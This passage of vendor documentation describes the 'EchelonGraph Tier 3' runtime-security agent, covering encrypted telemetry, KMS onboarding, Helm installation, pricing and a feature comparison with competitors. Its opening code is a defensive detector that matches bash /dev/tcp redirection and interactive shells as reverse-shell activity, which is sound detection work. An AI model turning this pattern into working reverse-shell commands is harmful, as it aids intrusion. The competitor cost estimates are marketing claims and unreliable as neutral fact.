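// Deliberately simplified detectors for illustration; NOT the shipped rules.
const NET_REDIRECT = /\/dev\/(tcp|udp)\/([^/\s]+)\/(\d{1,5})/;

interface Verdict {
  rules: string[];
  destination?: { host: string; port: number };
}

function evaluateExec(cmdline: string, iocHosts: ReadonlySet<string>): Verdict {
  const rules: string[] = [];
  const m = NET_REDIRECT.exec(cmdline);
  if (m === null) return { rules }; // no bash network redirection at all
  const destination = { host: m[2], port: Number(m[3]) };
  // An interactive shell whose I/O goes to a network socket.
  if (/\b(?:ba|da|z|k)?sh\b/.test(cmdline) && /\s-i\b/.test(cmdline)) {
    rules.push("T3.4-PROC-REVERSE-SHELL");
  }
  // Destination appears in the locally cached threat-intel set.
  if (iocHosts.has(destination.host)) rules.push("T3.6-IOC-MATCH");
  return { rules, destination };
}
```

Everything this function touches is plaintext, which is why it has to run on the host before the payload is encrypted.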

Two decryption paths

Browser SDK (T3.11+) — the dashboard at app.echelongraph.io renders decrypted detail in the operator's browser using the open-source @echelongraph/zkdecrypt TypeScript SDK. Customer signs into their KMS via OIDC; the SDK calls the customer's Vault / AWS / GCP KMS directly from the browser to unwrap each event's DEK. EchelonGraph backend never sees the plaintext.

  • Vault Transit: shipped in T3.11.
  • AWS KMS via SigV4 + Cognito / STS federation: shipped in T3.12.
  • GCP Cloud KMS via Google Identity Services / Workload Identity Federation: shipped in T3.13.

Go SDK (sdk/zkdecrypt) — for SOC pipelines, SIEM forwarders, and analytics notebooks. Customer fetches the KEK from their KMS via the provider CLI (aws kms decrypt, gcloud kms decrypt, vault read), passes it to the SDK along with the encrypted envelope, gets back plaintext. Run anywhere Go runs — Lambda, Cloud Run, on-prem worker.

Both paths share the same envelope wire format. See /docs/tier3-zk-decryption for the full SDK reference.

Verifying the property

# Inspect the ciphertext directly in the CloudSQL database; it should be unreadable.
gcloud sql connect ... --database=echelongraph
# then, at the SQL prompt:
SELECT id, encrypted_payload FROM zk_telemetry LIMIT 1;

The encrypted_payload column is AES-256-GCM ciphertext. Even with full read access to our DB, an attacker (or an EchelonGraph employee) cannot reconstruct the underlying event.


Customer responsibilities

When you onboard Tier 3, here's what's on your side vs. ours:

Responsibility | You | EchelonGraph
Provision Helm chart on your cluster | ✓ | –
Provide a customer-managed KMS key | ✓ | –
Set IAM policy / Vault token for the agent | ✓ | –
Configure NetworkPolicy egress to ingest endpoint | ✓ | –
Maintain agent upgrades (chart minor bumps) | ✓ (you helm upgrade) | ✓ (we publish)
Operate the SaaS dashboard / API | – | ✓
Maintain ingest pipeline, storage, indexing | – | ✓
Run feed updates (URLhaus, CISA KEV) | – | ✓ (agent pulls; you can air-gap)
Define custom compliance frameworks | ✓ | –
Approve auto-remediation patches | ✓ (admin RBAC) | –

One-time onboarding (~15 min)

  1. Create a KMS key. AWS: arn:aws:kms:...; GCP: projects/.../cryptoKeys/...; Vault: transit/keys/echelongraph.
  2. Grant the agent's principal Encrypt + Decrypt on that key only.
  3. Generate a one-time enrollment OTP in your dashboard (Settings → Agents → New).
  4. helm install the chart with the OTP + KMS config. The agent auto-enrolls.
  5. Verify via kubectl port-forward + /readyz (returns 200 once eBPF hooks attach).

After step 5, your dashboard's "Connected Agents" indicator goes green and findings start flowing.
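
For AWS, step 2 translates into a one-statement IAM policy. A small TypeScript sketch that builds it; agentKeyPolicy is a hypothetical name, the ARN validation is our own guard against granting on an alias or wildcard, and the action list is exactly the Encrypt + Decrypt pair from step 2 (if your agent configuration also calls other KMS APIs, add them deliberately).

```typescript
// Least-privilege IAM policy for onboarding step 2 (AWS only).
interface PolicyStatement {
  Effect: "Allow" | "Deny";
  Action: string[];
  Resource: string;
}

interface PolicyDocument {
  Version: "2012-10-17";
  Statement: PolicyStatement[];
}

// Accepts key ARNs only (not aliases or wildcards), across AWS partitions.
const KMS_KEY_ARN = /^arn:aws(?:-[a-z]+)*:kms:[a-z0-9-]+:\d{12}:key\/[A-Za-z0-9-]+$/;

function agentKeyPolicy(keyArn: string): PolicyDocument {
  if (!KMS_KEY_ARN.test(keyArn)) {
    throw new Error(`expected a KMS key ARN, got: ${keyArn}`);
  }
  return {
    Version: "2012-10-17",
    Statement: [
      {
        Effect: "Allow",
        Action: ["kms:Encrypt", "kms:Decrypt"], // exactly step 2: Encrypt + Decrypt
        Resource: keyArn,                        // on that key only
      },
    ],
  };
}
```

JSON.stringify(agentKeyPolicy(arn), null, 2) yields a policy document you can attach to the agent's role.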


Pricing model

EchelonGraph Tier 3 prices on node count, not on event volume — your cost is predictable regardless of traffic spikes.

Plan | Price | Nodes | Includes
Team | $49/node/month | up to 50 | All T3.0–T3.10 features, AWS/GCP/Vault KMS, 30-day retention
Pro | $149/node/month | up to 250 | Team + 1-year retention + auto-remediation PR mode + custom compliance
Enterprise | Contact sales | unlimited | Pro + air-gapped install + dedicated SaaS region + custom SLA

Volume discounts apply at 100+ / 500+ / 1000+ nodes.

Cost comparison vs. competitors

For a typical mid-size deployment (100 nodes, 50K events/sec average):

Vendor | Annual cost (est.) | Notes
EchelonGraph Tier 3 (Pro) | $178,800 | $149 × 100 × 12, flat node price
Sysdig Secure | ~$240,000 | Per-node + per-image scanning + per-host runtime; tiered pricing
Aqua CSPM + Runtime | ~$280,000 | Per-workload + per-cluster + add-on for agentless runtime
Falco Cloud (Sysdig) | ~$192,000 | Per-node, no auto-remediation, no compliance builder, no KMS BYOK
Wiz Runtime Sensor | ~$320,000+ | Bundled w/ CNAPP suite; minimum bundle pricing
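
The first row of that table is plain list-price arithmetic. A sketch using the Team and Pro prices and node caps from the plan table; annualListPriceUsd is a hypothetical name, volume discounts (100+ / 500+ / 1000+ nodes) are left out because their rates aren't given here, and Enterprise is priced by sales.

```typescript
// List-price arithmetic from the plan table; discounts and Enterprise not modelled.
type Plan = "team" | "pro";

const PLANS: Record<Plan, { perNodeMonthlyUsd: number; maxNodes: number }> = {
  team: { perNodeMonthlyUsd: 49, maxNodes: 50 },
  pro: { perNodeMonthlyUsd: 149, maxNodes: 250 },
};

function annualListPriceUsd(plan: Plan, nodes: number): number {
  const p = PLANS[plan];
  if (!Number.isInteger(nodes) || nodes < 1) {
    throw new Error("nodes must be a positive integer");
  }
  if (nodes > p.maxNodes) {
    throw new Error(`${plan} covers up to ${p.maxNodes} nodes`);
  }
  // Node count is the only variable: event volume never enters the price.
  return p.perNodeMonthlyUsd * nodes * 12;
}
```

For the 100-node example, annualListPriceUsd("pro", 100) gives the $178,800 in the table, whatever the event rate.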

Why Tier 3 costs less:

  1. No per-image scanning charge — Tier 3 doesn't replicate the Tier 1/2 cloud + image scanning surface; that's already covered by EchelonGraph's other tiers.
  2. No per-event metering — your traffic spike doesn't change your bill.
  3. Self-hosted agent — we don't run inference servers on your data; you pay for SaaS dashboard + indexing only.
  4. BYOK is included — Sysdig charges $50K+ for "private cloud" SKUs that include customer-managed encryption.

Why we cost what we do

  • R&D: every detection rule has a documented MITRE ATT&CK mapping, a reference to a public threat report, and an integration test. Detection quality is our moat.
  • Custom compliance builder: DORA / NIS2 / CMMC / FedRAMP templates ready out-of-box. Most competitors charge add-ons.
  • Hardware KMS: AWS + GCP + Vault native — not "bring a CSV of indicators" or "managed inside our cloud."
  • Auto-remediation: 9 IaC patch templates with audit trail + admin approval workflow. Sysdig/Aqua charge for "remediation packages" as add-ons.
  • Air-gapped support: scripts/airgap-bundle.sh ships a complete tarball; no phone-home required.

Security comparison

CapabilityTier 3SysdigAquaFalcoWiz
Zero-knowledge data plane (BYOK encryption)
Kernel-level eBPF telemetry✓ (sensor)
Process monitoring + reverse-shell detection
Network anomaly detection (ML-statistical)
Custom compliance framework builderpartialpartial
Auto-remediation IaC PR generation
Air-gapped mode (no phone-home)partial
AWS / GCP / Vault KMS integrationpartial
Per-tenant suppression rules
Threat-intel: STIX 2.1 + TAXII 2.1 nativepartialpartial
MITRE ATT&CK auto-taggingpartial
EU GDPR / DPDP Article-25 by designpartialpartialpartial
Open-source customer SDK (zkdecrypt)✓ (rule lang)

Three things only EchelonGraph Tier 3 does

  1. Zero-knowledge data plane. Your encrypted payload arrives at our infrastructure — and we cannot decrypt it. Sysdig/Aqua/Wiz all have access to your raw event data; Falco runs entirely on-prem (no SaaS analytics).
  2. End-to-end auto-remediation with admin approval. Detect → generate IaC patch (Terraform / K8s / Helm) → open PR → admin approves → apply. Sysdig + Aqua have advisory remediation; only ours closes the loop while keeping a full audit trail.
  3. Customer-defined compliance frameworks. DORA / NIS2 / CMMC / FedRAMP templates plus the option to build your own (versioned, immutable-once-published, JSON portable). Sysdig/Aqua ship fixed framework catalogs.
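
The "generate IaC patch" step can be pictured as template substitution. A hypothetical sketch that produces the same deny-all-egress NetworkPolicy as the incident walkthrough from a finding's metadata; the input shape and the function name denyEgressPolicy are our own, and the shipped T3.7 templates may differ. kubectl apply -f accepts JSON manifests, so JSON.stringify of the result can be applied directly, although the PR flow commits it to your IaC repo instead.

```typescript
// Hypothetical template step: input shape and name are ours, not T3.7's.
interface RemediationInput {
  findingId: string;  // e.g. "f-9d4e2a17"
  ruleId: string;     // e.g. "T3.4-PROC-REVERSE-SHELL"
  namespace: string;
  app: string;        // value of the offending pods' "app" label
}

function denyEgressPolicy(f: RemediationInput) {
  // Keep the name DNS-safe: lowercase alphanumerics and '-', at most 63 chars.
  const appPart = f.app.toLowerCase().replace(/[^a-z0-9-]/g, "-");
  const idPart = f.findingId.toLowerCase().replace(/[^a-z0-9]/g, "");
  const name = `deny-egress-${appPart}-incident-${idPart}`.slice(0, 63).replace(/-+$/, "");
  return {
    apiVersion: "networking.k8s.io/v1",
    kind: "NetworkPolicy",
    metadata: {
      name,
      namespace: f.namespace,
      annotations: {
        "echelongraph.io/finding": f.findingId,
        "echelongraph.io/rule": f.ruleId,
      },
    },
    spec: {
      podSelector: { matchLabels: { app: f.app } },
      policyTypes: ["Egress"],
      egress: [] as object[], // Egress policy with no rules = deny all outbound
    },
  };
}
```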

Installation

1. Pull the chart

helm pull oci://us-central1-docker.pkg.dev/echelongraph-prod/echelon-customer/echelongraph-tier3 --version 0.3.0

2. Configure KMS

Pick one provider (AWS KMS, GCP Cloud KMS, or HashiCorp Vault) and follow its per-provider setup guide.

3. Enroll + install

export ECHELON_AGENT_ENROLL_TOKEN="<otp from dashboard>"

helm upgrade --install echelongraph-tier3 \
  oci://us-central1-docker.pkg.dev/echelongraph-prod/echelon-customer/echelongraph-tier3 --version 0.3.0 \
  -n echelongraph-system --create-namespace \
  --set tenant.id="<your-tenant-id>" \
  --set secrets.encryptionKey="$(openssl rand -hex 32)" \
  --set secrets.enrollmentToken="$ECHELON_AGENT_ENROLL_TOKEN" \
  --set secrets.enrollmentEndpoint="https://app.echelongraph.io" \
  --set ingester.address="ingest.echelongraph.io:443"
# To use an external KMS provider (AWS/GCP/Vault) instead of the in-cluster BYOK
# key passed in secrets.encryptionKey, configure it per TIER3_KMS_SETUP.md (step 2).
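`openssl rand -hex 32` produces 32 random bytes (a 256-bit key) printed as 64 hex characters. If your CI image has no openssl binary, a minimal Go equivalent is sketched below, together with a pre-flight check for the same shape. The function names are hypothetical, and the assumption that the chart expects exactly 64 hex characters is inferred from the openssl command above rather than from chart documentation.

```go
package main

import (
	"crypto/rand"
	"encoding/hex"
	"fmt"
)

// newEncryptionKey returns 32 cryptographically random bytes as 64 lowercase
// hex characters, the same shape `openssl rand -hex 32` prints.
func newEncryptionKey() (string, error) {
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	return hex.EncodeToString(b), nil
}

// validEncryptionKey reports whether s is hex that decodes to exactly 32 bytes.
func validEncryptionKey(s string) bool {
	b, err := hex.DecodeString(s)
	return err == nil && len(b) == 32
}

func main() {
	key, err := newEncryptionKey()
	if err != nil {
		panic(err)
	}
	fmt.Println(key)
}
```

Usage, assuming the file is saved under the hypothetical name genkey.go: `--set secrets.encryptionKey="$(go run genkey.go)"`.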

4. Verify

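kubectl get pods -n echelongraph-system
# tier3-master-xxx       1/1 Running
# tier3-tentacle-xxx     1/1 Running   (one per node)

# Health check via port-forward (agent images are distroless, so there is no shell to exec into)
kubectl port-forward -n echelongraph-system deploy/tier3-master 8087:8087 &
sleep 2   # give the port-forward time to bind before querying it
curl -sS -o /dev/null -w '%{http_code}\n' http://localhost:8087/readyz
# prints 200 once the eBPF hooks are attached and the ingester is reachable
kill $!   # stop the background port-forward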

In your EchelonGraph dashboard, the agent should show "Connected" within 30 seconds.


Air-gapped customers

For environments with no outbound internet (regulated finance, government, defense):

# 1. On a connected machine, build the bundle.
./scripts/airgap-bundle.sh --version=1.16.0 --include-ioc

# 2. Transfer the .tar.zst to your air-gapped network.
# 3. Load images into your private registry.
# 4. Run helm install with TIER3_AIRGAPPED=true and image overrides pointing at your private registry.

The bundle includes:

  • Master + Tentacle Docker images
  • Helm chart (.tgz)
  • Grafana dashboard JSON
  • Prometheus alert rules
  • (Optional, with --include-ioc) IOC database snapshot taken at bundle time

What customers do NOT need to do

  • No CVE or IOC feed maintenance. Tier 3 pulls abuse.ch URLhaus + Feodo Tracker + CISA KEV automatically every 6 hours. Air-gapped customers ship snapshots in the bundle instead.
  • No anomaly model training. The statistical baseline (24h rolling window + EWMA + seasonality) is fully unsupervised; warm-up takes 24h after install.
  • No rule authoring for the basics. 30+ detection rules ship out of the box (T3.4 process + T3.5 anomaly + T3.6 IOC); custom rules are optional.
  • No new on-call tooling. Alerts are defined in the PrometheusRule resources we ship, so your existing Alertmanager routes them to PagerDuty / Slack / email.
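The exact anomaly model is not published here, so the following only illustrates the EWMA idea behind the baseline: a Go sketch that tracks an exponentially weighted mean and variance of one metric (for example, bytes per minute for a workload), stays silent during a warm-up, and flags samples more than k standard deviations from the mean. The smoothing factor, threshold, and warm-up count are assumptions; warm-up is counted in samples as a stand-in for the 24h window, and seasonality is not modelled.

```go
package main

import (
	"fmt"
	"math"
)

// ewmaDetector tracks an exponentially weighted mean and variance of one
// metric and flags samples far outside that baseline.
type ewmaDetector struct {
	alpha    float64 // smoothing factor in (0, 1]; larger reacts faster
	k        float64 // alert threshold, in standard deviations
	warmup   int     // samples to observe before any alert can fire
	n        int
	mean     float64
	variance float64
}

// Observe scores x against the baseline as it stood before x arrived,
// then folds x into the baseline with the incremental EWMA update.
func (d *ewmaDetector) Observe(x float64) bool {
	d.n++
	if d.n == 1 {
		d.mean = x
		return false
	}
	diff := x - d.mean
	anomalous := d.n > d.warmup && math.Abs(diff) > d.k*math.Sqrt(d.variance)
	incr := d.alpha * diff
	d.mean += incr
	d.variance = (1 - d.alpha) * (d.variance + diff*incr)
	return anomalous
}

func main() {
	d := &ewmaDetector{alpha: 0.1, k: 3, warmup: 20}
	// Steady traffic oscillating around 100, then one spike.
	for i := 0; i < 60; i++ {
		x := 98.0
		if i%2 == 0 {
			x = 102.0
		}
		d.Observe(x)
	}
	fmt.Println("spike flagged:", d.Observe(1000))
}
```

One design choice worth noting: this sketch folds anomalous samples into the baseline as well, so a sustained shift eventually becomes the new normal; a production detector might exclude or down-weight flagged samples instead.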

Operational reference

Doc                        Topic
TIER3_DEPLOYMENT.md        Customer install, configuration, and troubleshooting catalog
TIER3_KMS_SETUP.md         AWS / GCP / Vault setup, with IAM permissions per provider
TIER3_BACKUP_RESTORE.md    Postgres + ClickHouse export/import, plus RTO/RPO matrix
UPGRADING.md               Version compatibility matrix + per-version migration list
CHANGELOG.md               Full release history

Confidence checklist for security review

If your security team is evaluating Tier 3, here's the audit trail they typically request:

  • [ ] eBPF verifier compliance: every program is loaded through cilium/ebpf and must pass the kernel verifier; programs that fail verification are rejected at load time.
  • [ ] Not privileged by default: the tentacle runs with an explicit capability set (CAP_SYS_ADMIN, CAP_BPF, CAP_NET_ADMIN) rather than as a fully privileged container; full privilege is an opt-in escape hatch for restrictive kernels only. No host filesystem writes. No host network.
  • [ ] Customer-managed encryption keys: TIER3_KMS_PROVIDER selects your KMS; envelope encryption uses a per-event DEK wrapped by your KEK, and we never see plaintext.
  • [ ] Open-source SDK: sdk/zkdecrypt is the canonical decryption path, written in auditable Go.
  • [ ] No outbound traffic from the agent beyond ingest.echelongraph.io:443, plus the enrollment endpoint (app.echelongraph.io) during enrollment. Air-gapped mode disables even that.
  • [ ] License feature flags: every paid feature is gated behind a license claim signed by EchelonGraph; rotation is supported.
  • [ ] Public threat-intel feeds: abuse.ch and CISA KEV are public sources; the agent never sends your findings to those upstream services.
  • [ ] Audit log: every admin-grade action (remediation approval, framework publish, agent enrollment) is logged.

Uninstall

helm uninstall echelongraph-tier3 -n echelongraph-system
kubectl delete namespace echelongraph-system

The agent zeroes the DEKs it holds in memory on shutdown. Wrapped DEKs and ciphertext already stored in our backend remain (we cannot decrypt them without your KMS); for full removal, email support@echelongraph.io with a tenant deletion request and we will delete your tenant's ciphertext rows.
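A minimal Go sketch of zeroing key material on shutdown, assuming the DEK is held in a byte slice; the `keyHolder` type is hypothetical and not the agent's code. In a garbage-collected language this is best effort: the runtime may already have copied the bytes elsewhere, so zeroing reduces exposure rather than eliminating it.

```go
package main

import (
	"fmt"
	"os"
	"os/signal"
	"sync"
	"syscall"
)

// keyHolder guards an in-memory DEK.
type keyHolder struct {
	mu  sync.Mutex
	dek []byte
}

// Zero overwrites the DEK bytes in place, then drops the reference.
func (k *keyHolder) Zero() {
	k.mu.Lock()
	defer k.mu.Unlock()
	clear(k.dek)
	k.dek = nil
}

func main() {
	k := &keyHolder{dek: make([]byte, 32)}
	sigs := make(chan os.Signal, 1)
	signal.Notify(sigs, syscall.SIGTERM, os.Interrupt)
	done := make(chan struct{})
	go func() {
		<-sigs // Kubernetes sends SIGTERM when the pod is being deleted
		k.Zero()
		close(done)
	}()
	// Agent work would run here; for this demo, simulate the signal.
	sigs <- syscall.SIGTERM
	<-done
	fmt.Println("DEK zeroed")
}
```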